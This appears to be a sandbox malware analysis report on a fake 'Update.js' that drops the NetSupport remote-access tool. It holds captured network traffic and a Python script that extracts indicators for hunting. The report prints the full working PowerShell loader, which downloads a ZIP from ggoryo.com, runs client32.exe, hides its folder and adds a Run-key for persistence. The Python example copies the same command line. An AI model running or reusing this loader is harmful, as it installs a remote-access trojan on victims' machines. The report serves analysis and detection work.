                                                                                                                                                  2024-10-08 13:23:29 UTC16384INData Raw: 2c 20 22 20 22 29 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5c 74 5c 72 5c 6e 20 5d 2b 7c 5b 5c 74 5c 72 5c 6e 20 5d 2b 24 2f 67 2c 20 22 22 29 0a 7d 3b 0a 6b 2e 73 74 72 69 6e 67 2e 74 72 69 6d 20 3d 20 6b 2e 73 74 72 69 6e 67 2e 69 6e 74 65 72 6e 61 6c 2e 74 72 69 6d 3b 0a 6b 2e 73 74 72 69 6e 67 2e 74 72 69 6d 4c 65 66 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5c 73 5c 78 61 30 5d 2b 2f 2c 20 22 22 29 0a 7d 3b 0a 6b 2e 73 74 72 69 6e 67 2e 74 72 69 6d 52 69 67 68 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 2f 5b 5c 73 5c 78 61 30 5d 2b 24 2f 2c 20 22 22 29 0a 7d 3b 0a 6b 2e 73 74 72 69 6e 67 2e 63 61 73
                                                                                                                                                  Data Ascii: , " ").replace(/^[\t\r\n ]+|[\t\r\n ]+$/g, "")};k.string.trim = k.string.internal.trim;k.string.trimLeft = function(a) { return a.replace(/^[\s\xa0]+/, "")};k.string.trimRight = function(a) { return a.replace(/[\s\xa0]+$/, "")};k.string.cas


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.16 | 49707 | 77.83.199.112 | 443 | 6704 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 13:23:43 UTC | 77 | OUT | GET /trade/da.php?9800 HTTP/1.1
Host: ggoryo.com
Connection: Keep-Alive
2024-10-08 13:23:44 UTC | 198 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 13:23:44 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
2024-10-08 13:23:44 UTC | 7994 | IN | Data Raw: 33 30 30 31 63 38 0d 0a 55 45 73 44 42 42 51 41 41 41 41 49 41 42 78 45 56 31 65 64 6e 69 58 6d 4a 6d 77 41 41 4a 43 56 41 51 41 4d 41 41 41 41 59 32 78 70 5a 57 35 30 4d 7a 49 75 5a 58 68 6c 37 48 77 48 65 46 54 46 31 2f 66 5a 39 45 34 4b 41 53 4c 36 55 76 36 67 69 42 4a 42 6b 56 63 49 68 45 41 49 6e 59 54 30 73 70 75 79 32 56 52 71 67 43 53 41 45 41 56 52 2f 30 43 6f 41 6f 49 67 69 68 44 53 4e 79 47 46 6b 74 43 4c 51 42 41 51 61 55 6f 58 70 4b 54 33 6e 67 33 6e 4f 7a 4f 37 6d 77 49 4a 55 6f 4c 79 66 67 2f 6e 37 75 2f 65 6d 54 74 6e 7a 73 79 39 76 7a 4e 6e 5a 6d 35 34 6d 4f 43 78 43 6c 51 42 51 49 32 41 43 4c 41 48 35 47 49 46 66 79 39 2f 45 67 79 36 5a 42 70 41 75 76 61 5a 62 6e 73 45 34 38 39 30 63 77 6f 4b 6e 74 55 31 5a 4f 62 30 77 4a 6e 69 71 56 30
Data Ascii: 3001c8UEsDBBQAAAAIABxEV1edniXmJmwAAJCVAQAMAAAAY2xpZW50MzIuZXhl7HwHeFTF1/fZ9E4KASL6Uv6giBJBkVcIhEAInYT0spuy2VRqgCSAEAVR/0CoAoIgihDSNyGFktCLQBAQaUoXpKT3ng3nOzO7mwIJUoLyfg/n7u/emTtnzsy9vzNnZm54mOCxClQBQI2ACLAH5GIFfy9/Egy6ZBpAuvaZbnsE4890cwoKntU1ZOb0wJniqV0
                                                                                                                                                  2024-10-08 13:23:44 UTC16384INData Raw: 35 39 62 6c 4e 75 39 7a 37 6d 46 6c 56 69 35 68 49 68 31 32 46 7a 53 39 4f 36 53 52 54 37 70 53 4c 39 42 76 36 56 38 7a 2f 6a 6e 6e 33 2f 59 58 37 77 72 50 6a 58 2b 48 64 39 48 78 50 63 4e 44 48 65 51 36 39 74 51 50 46 2f 32 77 54 41 6b 37 46 4c 4d 4c 65 77 6a 50 6a 4a 77 51 63 50 48 75 43 44 2b 2f 63 78 76 36 51 53 62 31 77 38 67 30 6e 42 76 54 42 36 49 6d 43 38 55 50 38 70 37 4f 6e 52 66 41 4b 59 50 6d 38 6b 5a 70 4f 39 6e 50 77 69 4f 55 66 33 37 79 74 77 44 37 50 7a 38 76 46 42 66 6a 48 4e 43 38 36 34 62 51 78 67 77 74 50 59 46 65 72 7a 6d 4a 49 61 50 68 6a 76 33 61 66 2b 50 63 68 75 73 4d 6e 53 65 53 58 56 75 48 65 70 6b 4f 76 45 75 2b 73 32 71 35 74 4d 59 7a 2f 4a 6b 2f 67 33 49 2f 37 62 74 51 33 2f 7a 34 73 58 35 74 2f 74 35 66 43 66 46 62 65 55 6a
                                                                                                                                                  Data Ascii: 59blNu9z7mFlVi5hIh12FzS9O6SRT7pSL9Bv6V8z/jnn3/YX7wrPjX+Hd9HxPcNDHeQ69tQPF/2wTAk7FLMLewjPjJwQcPHuCD+/cxv6QSb1w8g0nBvTB6ImC8UP8p7OnRfAKYPm8kZpO9nPwiOUf37ytwD7Pz8vFBfjHNC864bQxgwtPYFerzmJIaPhjv3af+PchusMnSeSXVuHepkOvEu+s2q5tMYz/Jk/g3I/7btQ3/z4sX5t/t5fCfFbeUj
                                                                                                                                                  2024-10-08 13:23:44 UTC16384INData Raw: 51 62 67 4f 49 43 62 4e 32 36 6c 63 65 42 4a 69 78 66 76 72 77 4e 56 71 78 59 77 64 73 52 31 71 31 62 69 32 66 50 6e 6d 50 35 79 71 2b 52 2b 64 30 58 61 4e 6f 53 68 79 75 5a 4d 54 77 57 4d 73 58 44 70 50 6a 65 50 44 34 30 34 33 53 5a 63 62 76 55 4c 73 59 37 38 65 54 78 68 56 74 69 76 63 76 35 38 6e 6a 67 73 2f 47 7a 44 50 49 34 6d 34 6e 79 4d 38 55 69 76 6c 30 34 6a 2f 50 2f 38 4d 4d 50 51 32 6c 2f 4f 2b 6b 35 37 61 6d 6b 2f 48 65 64 37 58 31 70 58 55 62 2b 2b 43 54 76 31 32 76 59 57 74 6e 38 4e 53 35 6b 70 65 44 71 39 6a 6d 63 6e 35 79 62 48 4e 4c 34 78 31 4b 38 69 66 6e 46 4f 66 48 72 32 65 38 55 4c 34 78 69 42 74 30 70 53 6f 61 66 70 5a 53 2f 62 48 38 6f 38 61 64 31 32 7a 35 32 53 30 66 37 77 57 69 65 69 50 2b 58 33 36 37 44 39 6f 31 66 73 54 46 50 77
                                                                                                                                                  Data Ascii: QbgOICbN26lceBJixfvrwNVqxYwdsR1q1bi2fPnmP5yq+R+d0XaNoShyuZMTwWMsXDpPjePD4043SZcbvULsY78eTxhVtivcv58njgs/GzDPI4m4nyM8Uivl04j/P/8MMPQ2l/O+k57amk/Hed7X1pXUb++CTv12vYWtn8NS5kpeDq9jmcn5ybHNL4x1K8ifnFOfHr2e8UL4xiBt0pSoafpZS/bH8o8ad12z52S0f7wWieiP+X367D9o1fsTFPw
                                                                                                                                                  2024-10-08 13:23:44 UTC16384INData Raw: 56 61 47 56 47 46 43 65 5a 56 34 38 75 35 49 32 6d 4a 6c 63 48 2f 6c 66 4d 5a 2f 50 2b 54 74 76 78 49 2f 6d 4e 6a 46 2b 44 76 33 6b 36 39 44 48 58 70 62 2b 41 54 55 31 52 69 61 51 4f 52 46 53 44 53 36 39 47 75 42 31 46 51 35 38 46 64 66 6d 46 66 6b 33 59 51 67 38 51 52 78 6e 70 6f 30 70 48 5a 38 53 70 53 44 41 69 74 51 42 69 34 6d 63 4c 7a 31 4f 36 7a 55 4a 52 5a 44 30 42 56 72 72 30 57 34 48 49 70 4a 6c 36 4b 6f 39 33 56 62 4d 65 31 52 66 34 75 55 58 6a 6d 65 7a 51 50 45 4b 4d 68 30 42 69 6d 39 33 6f 76 72 44 66 34 64 70 4d 70 48 35 4a 6d 4e 6f 41 79 79 30 6e 67 32 57 46 31 37 53 67 45 54 74 62 54 31 76 50 44 67 7a 53 75 4e 56 50 64 32 6b 6f 47 58 32 4d 79 65 4f 6e 64 53 2b 72 50 5a 66 56 61 56 61 6f 76 42 48 30 65 62 62 6f 46 39 42 2f 79 4b 72 36 34 56
                                                                                                                                                  Data Ascii: VaGVGFCeZV48u5I2mJlcH/lfMZ/P+TtvxI/mNjF+Dv3k69DHXpb+ATU1RiaQORFSDS69GuB1FQ58FdfmFfk3YQg8QRxnpo0pHZ8SpSDAitQBi4mcLz1O6zUJRZD0BVrr0W4HIpJl6Ko93VbMe1Rf4uUXjmezQPEKMh0Bim93ovrDf4dpMpH5JmNoAyy0ng2WF17SgETtbT1vPDgzSuNVPd2koGX2MyeOndS+rPZfVaVaovBH0ebboF9B/yKr64V
                                                                                                                                                  2024-10-08 13:23:44 UTC16384INData Raw: 6b 52 54 65 6c 44 6b 4e 36 70 6a 6f 75 4c 71 35 70 74 2f 45 63 34 73 56 33 31 32 50 57 6f 4e 35 6c 44 55 42 32 44 48 71 44 65 2b 47 76 75 46 59 4e 5a 43 31 39 45 71 59 6b 68 72 6b 2b 45 6b 54 4c 51 36 72 57 49 48 6e 4d 36 52 53 44 50 62 32 56 4d 38 73 47 4c 4d 59 37 6f 35 72 36 65 42 78 6c 59 76 61 4b 58 65 5a 62 2b 38 57 6d 30 30 79 58 7a 69 33 6f 75 2b 68 6a 2b 39 69 63 53 30 55 4a 75 7a 4b 78 5a 39 79 48 62 48 36 37 37 43 44 34 2b 68 59 38 76 34 4f 4d 72 2b 50 67 61 50 72 36 44 6a 37 50 77 63 51 45 69 31 5a 7a 31 39 35 4f 67 67 41 67 42 79 39 35 6f 51 4f 35 42 31 71 32 47 31 47 49 36 38 63 55 59 62 64 33 37 39 32 68 57 7a 55 35 65 42 48 44 53 6f 58 72 35 30 4a 38 75 4d 77 68 38 4e 38 76 4e 79 63 54 66 64 78 53 59 2b 77 73 70 33 48 6b 57 50 66 52 77 43
                                                                                                                                                  Data Ascii: kRTelDkN6pjouLq5pt/Ec4sV312PWoN5lDUB2DHqDe+GvuFYNZC19EqYkhrk+EkTLQ6rWIHnM6RSDPb2VM8sGLMY7o5r6eBxlYvaKXeZb+8Wm00yXzi3ou+hj+9icS0UJuzKxZ9yHbH677CD4+hY8v4OMr+PgaPr6Dj7PwcQEi1Zz195OggAgBy95oQO5B1q2G1GI68cUYbd3792hWzU5eBHDSoXr50J8uMwh8N8vNycTfdxSY+wsp3HkWPfRwC
                                                                                                                                                  2024-10-08 13:23:44 UTC16384INData Raw: 50 78 6d 6b 67 34 36 31 36 37 4e 51 52 33 41 44 31 63 2f 34 5a 41 66 76 4e 4d 6a 6f 48 57 55 43 33 38 57 6d 44 4f 4b 72 59 48 55 75 74 76 73 78 76 71 63 2b 30 47 79 48 57 62 4b 75 2b 31 45 38 62 51 4f 61 5a 54 4c 72 6a 6a 7a 74 43 4e 4a 37 75 49 61 43 59 33 79 6e 50 5a 52 31 5a 78 4d 73 4f 66 61 32 4a 7a 53 6d 62 6a 2b 41 75 54 49 39 63 55 53 4a 51 39 70 75 61 2b 4c 4d 6d 52 46 44 44 4a 41 35 75 4e 73 73 63 73 4a 38 44 68 76 47 69 71 76 30 32 50 47 62 2b 51 47 30 6d 5a 6d 54 57 6c 7a 4a 78 56 41 74 67 59 71 59 2b 62 35 44 49 54 65 63 7a 6b 38 4a 6f 43 76 65 57 46 54 4c 36 5a 54 38 45 71 78 6a 49 63 58 6e 6a 73 5a 71 45 5a 6b 75 43 68 66 2f 6c 6d 2b 41 61 52 78 63 68 4e 2f 35 4c 2b 58 34 4a 56 4e 43 45 77 67 5a 46 76 49 2f 50 4d 63 67 62 37 75 44 54 35 56
                                                                                                                                                  Data Ascii: Pxmkg46167NQR3AD1c/4ZAfvNMjoHWUC38WmDOKrYHUutvsxvqc+0GyHWbKu+1E8bQOaZTLrjjztCNJ7uIaCY3ynPZR1ZxMsOfa2JzSmbj+AuTI9cUSJQ9pua+LMmRFDDJA5uNsscsJ8DhvGiqv02PGb+QG0mZmTWlzJxVAtgYqY+b5DITeczk8JoCveWFTL6ZT8EqxjIcXnjsZqEZkuChf/lm+AaRxchN/5L+X4JVNCEwgZFvI/PMcgb7uDT5V
                                                                                                                                                  2024-10-08 13:23:44 UTC16384INData Raw: 66 63 52 64 4e 73 30 4a 2f 48 4a 54 76 6e 75 31 5a 36 77 32 6a 6f 31 7a 59 6b 43 72 6e 6b 75 4d 70 79 72 34 37 6d 58 41 49 33 4a 55 78 73 4d 4d 2b 45 6e 57 64 77 4d 50 38 5a 59 66 75 4e 30 6a 4e 65 41 4f 57 44 2b 63 52 6f 47 4d 78 35 65 32 46 67 54 71 54 44 57 38 6f 74 4d 4a 6a 48 52 56 6f 37 53 68 76 4d 34 77 55 75 65 6d 55 65 56 75 36 6d 6f 36 37 42 53 6b 56 36 79 31 36 6f 5a 4b 7a 57 44 33 4f 35 39 30 4b 77 7a 4d 64 57 71 68 62 2f 74 57 51 69 36 43 59 38 4d 64 33 5a 77 6e 55 57 65 48 37 37 4b 49 41 45 76 6b 41 31 64 58 4e 69 56 7a 58 56 67 76 6c 4a 5a 4d 62 50 32 63 41 57 73 4d 35 43 79 6e 2f 64 76 34 74 71 79 6a 59 6b 6d 75 70 52 45 6a 70 62 7a 46 69 6c 57 2f 32 30 71 7a 34 43 4c 2f 48 46 50 2f 47 4d 38 6f 65 55 32 6a 4b 50 6f 55 70 53 34 4a 4a 44 37
                                                                                                                                                  Data Ascii: fcRdNs0J/HJTvnu1Z6w2jo1zYkCrnkuMpyr47mXAI3JUxsMM+EnWdwMP8ZYfuN0jNeAOWD+cRoGMx5e2FgTqTDW8otMJjHRVo7ShvM4wUuemUeVu6mo67BSkV6y16oZKzWD3O590KwzMdWqhb/tWQi6CY8Md3ZwnUWeH77KIAEvkA1dXNiVzXVgvlJZMbP2cAWsM5Cyn/dv4tqyjYkmupREjpbzFilW/20qz4CL/HFP/GM8oeU2jKPoUpS4JJD7
                                                                                                                                                  2024-10-08 13:23:44 UTC16384INData Raw: 70 4e 73 6b 45 77 43 73 6f 39 65 38 36 2f 33 68 35 64 50 57 79 39 6e 58 39 39 6d 64 75 67 2b 45 56 43 30 4e 67 67 66 56 6e 31 35 41 5a 7a 41 47 77 65 76 2f 37 6e 50 77 76 77 61 36 32 41 55 71 62 2b 6f 58 45 45 34 54 67 30 6c 76 7a 6c 30 64 69 45 67 50 79 73 6e 7a 79 58 50 7a 38 64 2b 66 50 7a 58 59 77 58 6c 52 64 6a 77 4d 77 74 4c 45 2f 4f 31 31 38 66 68 4d 79 68 73 57 72 6a 43 5a 31 32 76 64 78 68 47 78 47 45 35 66 63 50 6f 49 2f 52 33 51 4c 77 6d 68 32 61 63 61 55 38 36 57 58 6a 6d 4b 71 5a 39 44 67 5a 6e 39 52 2b 48 4d 73 49 79 34 6f 32 41 79 74 35 4d 73 73 63 57 77 44 55 74 63 2f 7a 62 6b 4e 52 67 69 44 4f 79 47 69 5a 6d 50 72 61 71 76 44 54 45 39 47 4d 36 68 38 6c 6e 62 70 32 42 72 43 6e 2f 52 6c 34 48 39 6d 57 74 43 55 6c 2f 4e 4a 55 4e 61 78 77 43
                                                                                                                                                  Data Ascii: pNskEwCso9e86/3h5dPWy9nX99mdug+EVC0NggfVn15AZzAGwev/7nPwvwa62AUqb+oXEE4Tg0lvzl0diEgPysnzyXPz8d+fPzXYwXlRdjwMwtLE/O118fhMyhsWrjCZ12vdxhGxGE5fcPoI/R3QLwmh2acaU86WXjmKqZ9DgZn9R+HMsIy4o2Ayt5MsscWwDUtc/zbkNRgiDOyGiZmPraqvDTE9GM6h8lnbp2BrCn/Rl4H9mWtCUl/NJUNaxwC
                                                                                                                                                  2024-10-08 13:23:44 UTC16384INData Raw: 62 51 4d 34 2b 65 30 2b 69 5a 53 38 2b 70 39 4a 78 43 7a 32 78 36 5a 74 45 7a 6b 35 34 5a 39 45 79 6a 70 34 4f 65 64 6e 72 61 36 4c 6b 56 74 2b 73 6d 31 39 47 7a 6e 70 34 4e 39 48 79 59 6e 6f 2f 53 38 33 46 36 50 6b 46 50 32 74 36 62 2f 41 77 39 6e 36 58 6e 62 6e 6f 2b 54 38 38 39 39 48 79 42 6e 76 76 70 2b 51 6f 39 51 2f 52 38 6a 5a 36 48 36 58 6d 45 35 32 6e 47 35 7a 76 30 33 6b 37 50 6b 2f 54 73 6f 47 63 6e 50 52 6b 39 54 39 47 7a 69 35 37 64 39 49 7a 53 73 34 2b 65 4a 73 72 48 52 6b 38 37 50 52 33 30 64 4e 49 7a 6a 5a 34 5a 39 4d 79 6b 5a 78 59 39 73 2b 6b 35 68 5a 35 54 36 5a 6c 4c 7a 32 6e 30 7a 4b 4e 6e 41 54 32 66 70 4f 63 38 65 70 62 53 73 34 2b 65 55 58 70 32 30 37 4f 4c 6e 71 66 6f 79 65 6a 5a 53 63 38 4f 65 70 36 6b 5a 7a 75 76 4c 7a 32 50 30
                                                                                                                                                  Data Ascii: bQM4+e0+iZS8+p9JxCz2x6ZtEzk54Z9Eyjp4Oednra6LkVt+sm19Gznp4N9HyYno/S83F6PkFP2t6b/Aw9n6Xnbno+T8899HyBnvvp+Qo9Q/R8jZ6H6XmE52nG5zv03k7Pk/TsoGcnPRk9T9Gzi57d9IzSs4+eJsrHRk87PR30dNIzjZ4Z9MykZxY9s+k5hZ5T6ZlLz2n0zKNnAT2fpOc8epbSs4+eUXp207OLnqfoyejZSc8Oep6kZzuvLz2P0
                                                                                                                                                  2024-10-08 13:23:44 UTC16384INData Raw: 63 36 2f 79 72 6c 58 30 6e 38 61 30 55 68 4e 68 4d 43 65 70 34 44 41 4a 44 72 4e 2f 58 47 62 46 5a 62 6a 62 6f 4d 46 58 45 79 71 4d 61 6e 69 77 72 57 39 6c 77 63 7a 53 74 34 4b 34 6d 59 55 48 63 66 70 64 61 75 67 37 52 58 56 4c 44 31 61 46 48 41 58 55 69 47 4a 74 4f 32 61 7a 51 41 48 66 49 73 45 32 35 4b 2f 2b 74 63 58 43 59 54 55 54 47 56 33 59 2f 35 4d 68 66 51 41 63 63 43 4e 64 39 55 6d 56 6f 4e 33 68 30 73 53 78 36 51 5a 50 56 39 39 46 74 4a 66 65 30 71 76 64 4f 72 30 32 6e 41 76 45 76 57 6d 76 52 47 6f 2b 37 36 4c 75 34 58 32 31 66 36 54 55 4d 31 4a 51 6f 48 57 2f 71 31 67 62 36 65 37 44 64 35 2b 66 69 70 61 6a 62 4d 51 6e 75 78 59 32 73 56 38 64 30 63 46 64 2b 53 64 58 46 31 56 54 4e 4d 4d 72 68 44 58 4c 31 67 4e 73 30 30 31 55 58 34 75 2b 73 77 6c
                                                                                                                                                  Data Ascii: c6/yrlX0n8a0UhNhMCep4DAJDrN/XGbFZbjboMFXEyqManiwrW9lwczSt4K4mYUHcfpdaug7RXVLD1aFHAXUiGJtO2azQAHfIsE25K/+tcXCYTUTGV3Y/5MhfQAccCNd9UmVoN3h0sSx6QZPV99FtJfe0qvdOr02nAvEvWmvRGo+76Lu4X21f6TUM1JQoHW/q1gb6e7Dd5+fipajbMQnuxY2sV8d0cFd+SdXF1VTNMMrhDXL1gNs001UX4u+swl



                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:09:23:18
                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js"
                                                                                                                                                  Imagebase:0x7ff7d1f60000
                                                                                                                                                  File size:170'496 bytes
                                                                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:8
                                                                                                                                                  Start time:09:23:38
                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
                                                                                                                                                  Imagebase:0x7ff7582a0000
                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true
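The command line recorded for this process is only lightly obfuscated: random variable names, one single-quoted literal per value, and a Get-Random suffix on the drop folder. The Python below is an added example and is not part of the Joe Sandbox report or of the sample. It resolves the string variables of the one-liner and extracts the hunting artefacts an analyst would want: the download URL, the Run-key path and value name, the dropped file names, and every drop folder the script can produce. Get-Random -Minimum -5 -Maximum 12 has an exclusive upper bound, so the suffix is an integer from -5 to 11 (this run drew 3, giving the EQMIUFUUUCW3 path seen in the client32.exe process below). The command line is copied from the report; the SPECIAL_FOLDERS mapping, the %APPDATA% notation and the function names are the example's own.

```python
import re
from typing import Dict

# PowerShell command line recorded for Target ID 8 in the report, used here as sample input.
CMDLINE = r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;'''

# .NET Environment.SpecialFolder names mapped to the variables a hunter would search with
# (assumed mapping for this example; extend as needed).
SPECIAL_FOLDERS = {
    "ApplicationData": "%APPDATA%",
    "LocalApplicationData": "%LOCALAPPDATA%",
    "UserProfile": "%USERPROFILE%",
}

ARG = r"(\$\w+|'[^']*')"  # a bare $variable or a single-quoted literal


def string_vars(cmd: str) -> Dict[str, str]:
    """Map $NAME -> value for every $NAME='literal' assignment in the one-liner."""
    return dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", cmd))


def resolve(token: str, env: Dict[str, str]) -> str:
    """Resolve a $variable through the collected assignments, or strip a literal's quotes."""
    token = token.strip()
    return env[token[1:]] if token.startswith("$") else token.strip("'")


def extract_iocs(cmd: str) -> dict:
    """Pull URL, persistence key, dropped names and all possible drop folders from the loader."""
    env = string_vars(cmd)
    iocs: dict = {}

    m = re.search(r"DownloadString\(" + ARG + r"\)", cmd)
    iocs["download_url"] = resolve(m.group(1), env) if m else None

    m = re.search(r"New-ItemProperty\s+-Path\s+" + ARG + r"\s+-Name\s+" + ARG, cmd)
    if m:
        iocs["run_key"] = resolve(m.group(1), env)
        iocs["run_value_name"] = resolve(m.group(2), env)

    # Join-Path <dir> '<name>' is how the zip and the extracted exe are named.
    iocs["dropped_files"] = re.findall(r"Join-Path\s+\$\w+\s+'([^']*)'", cmd)

    # Drop folder = GetFolderPath('X') + 'literal' + $rand, where $rand = Get-Random -Minimum a -Maximum b.
    # PowerShell's -Maximum is exclusive, so the suffix takes the values a .. b-1.
    m = re.search(r"GetFolderPath\('(\w+)'\)\+'([^']*)'\+\$(\w+)", cmd)
    if m:
        base = SPECIAL_FOLDERS.get(m.group(1), "%" + m.group(1) + "%") + m.group(2)
        rnd = re.search(
            r"\$" + re.escape(m.group(3)) + r"\s*=\s*Get-Random\s+-Minimum\s+(-?\d+)\s+-Maximum\s+(-?\d+)",
            cmd,
        )
        suffixes = range(int(rnd.group(1)), int(rnd.group(2))) if rnd else [""]
        iocs["drop_dir_candidates"] = [f"{base}{n}" for n in suffixes]
        exe = next((f for f in iocs["dropped_files"] if f.lower().endswith(".exe")), None)
        iocs["run_value_candidates"] = (
            [f"{d}\\{exe}" for d in iocs["drop_dir_candidates"]] if exe else []
        )
    return iocs


if __name__ == "__main__":
    for key, value in extract_iocs(CMDLINE).items():
        print(f"{key}: {value}")
```

Because the suffix is random per victim, a hunt for the literal EQMIUFUUUCW3 folder would miss other infections; the 17 candidate paths (EQMIUFUUUCW-5 through EQMIUFUUUCW11) are what the Run-key value and file-path searches should cover, and the hidden-attribute flip on the folder (Get-Item -Force; attributes='Hidden') means a directory listing without hidden files will not show it.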

                                                                                                                                                  Target ID:9
                                                                                                                                                  Start time:09:23:39
                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6684c0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:10
                                                                                                                                                  Start time:09:23:46
                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe"
                                                                                                                                                  Imagebase:0x440000
                                                                                                                                                  File size:103'824 bytes
                                                                                                                                                  MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2489223815.0000000000442000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2505080118.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
